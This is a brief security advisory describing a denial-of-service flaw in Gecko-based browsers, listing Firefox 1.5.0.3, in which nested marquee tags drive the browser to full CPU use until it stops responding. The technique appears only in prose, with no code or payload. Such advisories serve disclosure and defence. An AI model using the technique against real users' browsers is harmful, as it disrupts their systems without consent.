Gecko marquee DoS

SUMMARY
Marquee is an unofficial HTML first created by Microsoft for Internet
Explorer to scroll text without using Javascript.
Using multiple nested marquee tags allows attackers to DoS Gecko based web
browsers.
DETAILS
Vulnerable Systems:
* Firefox version 1.5.0.3
When using the marquee tags nested in each other, attackers can cause
Gecko based web browsers to consume 100% of the CPU for a long time,
causing the web browsers to stop responding.
